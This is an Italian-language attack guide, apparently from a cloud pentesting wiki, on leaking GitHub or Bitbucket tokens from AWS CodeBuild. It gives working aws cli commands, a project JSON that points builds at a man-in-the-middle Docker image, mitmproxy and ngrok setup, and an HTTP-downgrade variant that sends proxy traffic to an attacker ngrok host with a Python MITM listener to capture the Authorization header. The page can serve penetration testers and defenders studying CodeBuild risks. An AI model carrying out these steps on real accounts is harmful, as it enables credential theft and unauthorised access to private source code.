AWS Codebuild - Token Leakage

Recupera i Token Configurati di Github/Bitbucket

Per prima cosa, verifica se ci sono credenziali di origine configurate che potresti leak:

aws codebuild list-source-credentials

Via Docker Image

Se scopri che l'autenticazione, ad esempio a Github, è impostata nell'account, puoi esfiltrare quell'accesso (token GH o token OAuth) facendo in modo che Codebuild utilizzi un'immagine docker specifica per eseguire la build del progetto.

A tal fine, potresti creare un nuovo progetto Codebuild o modificare l'ambiente di uno esistente per impostare l'immagine Docker.

L'immagine Docker che potresti utilizzare è https://github.com/carlospolop/docker-mitm. Questa è un'immagine Docker molto basilare che imposterà le variabili d'ambiente https_proxy, http_proxy e SSL_CERT_FILE. Questo ti permetterà di intercettare la maggior parte del traffico dell'host indicato in https_proxy e http_proxy e di fidarti del certificato SSL indicato in SSL_CERT_FILE.

1. Crea e carica la tua immagine Docker MitM

• Segui le istruzioni del repository per impostare l'indirizzo IP del tuo proxy e impostare il tuo certificato SSL e costruisci l'immagine docker.

• NON IMPOSTARE http_proxy per non intercettare le richieste all'endpoint dei metadati.

• Potresti usare ngrok come ngrok tcp 4444 per impostare il proxy sul tuo host.

• Una volta costruita l'immagine Docker, caricala su un repository pubblico (Dockerhub, ECR...)

2. Imposta l'ambiente

• Crea un nuovo progetto Codebuild o modifica l'ambiente di uno esistente.

• Imposta il progetto per utilizzare l'immagine Docker precedentemente generata.

3. Imposta il proxy MitM sul tuo host

• Come indicato nel repository Github potresti usare qualcosa come:

mitmproxy --listen-port 4444  --allow-hosts "github.com"

4. Esegui la build e cattura le credenziali

• Puoi vedere il token nell'header Authorization:

Questo potrebbe essere fatto anche dal aws cli con qualcosa come

# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json

## With /tmp/buildspec.json
{
"name": "my-demo-project",
"source": {
"type": "GITHUB",
"location": "https://github.com/uname/repo",
"buildspec": "buildspec.yml"
},
"artifacts": {
"type": "NO_ARTIFACTS"
},
"environment": {
"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
"image": "docker.io/carlospolop/docker-mitm:v12",
"computeType": "BUILD_GENERAL1_SMALL",
"imagePullCredentialsType": "CODEBUILD"
}
}

## Json

# Start the build
aws codebuild start-build --project-name my-project2

Via HTTP protocol

Un attaccante con permessi elevati su un CodeBuild potrebbe leakare il token Github/Bitbucket configurato o, se i permessi sono stati configurati tramite OAuth, il token OAuth temporaneo utilizzato per accedere al codice.

• Un attaccante potrebbe aggiungere le variabili d'ambiente http_proxy e https_proxy al progetto CodeBuild puntando alla sua macchina (per esempio http://5.tcp.eu.ngrok.io:14972).

• Poi, cambiare l'URL del repository github per usare HTTP invece di HTTPS, per esempio: **http://**github.com/carlospolop-forks/TestActions

• Poi, eseguire l'esempio base da https://github.com/synchronizing/mitm nella porta indicata dalle variabili proxy (http_proxy e https_proxy)

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()

• Infine, clicca su Build the project, le credenziali saranno inviate in chiaro (base64) alla porta mitm: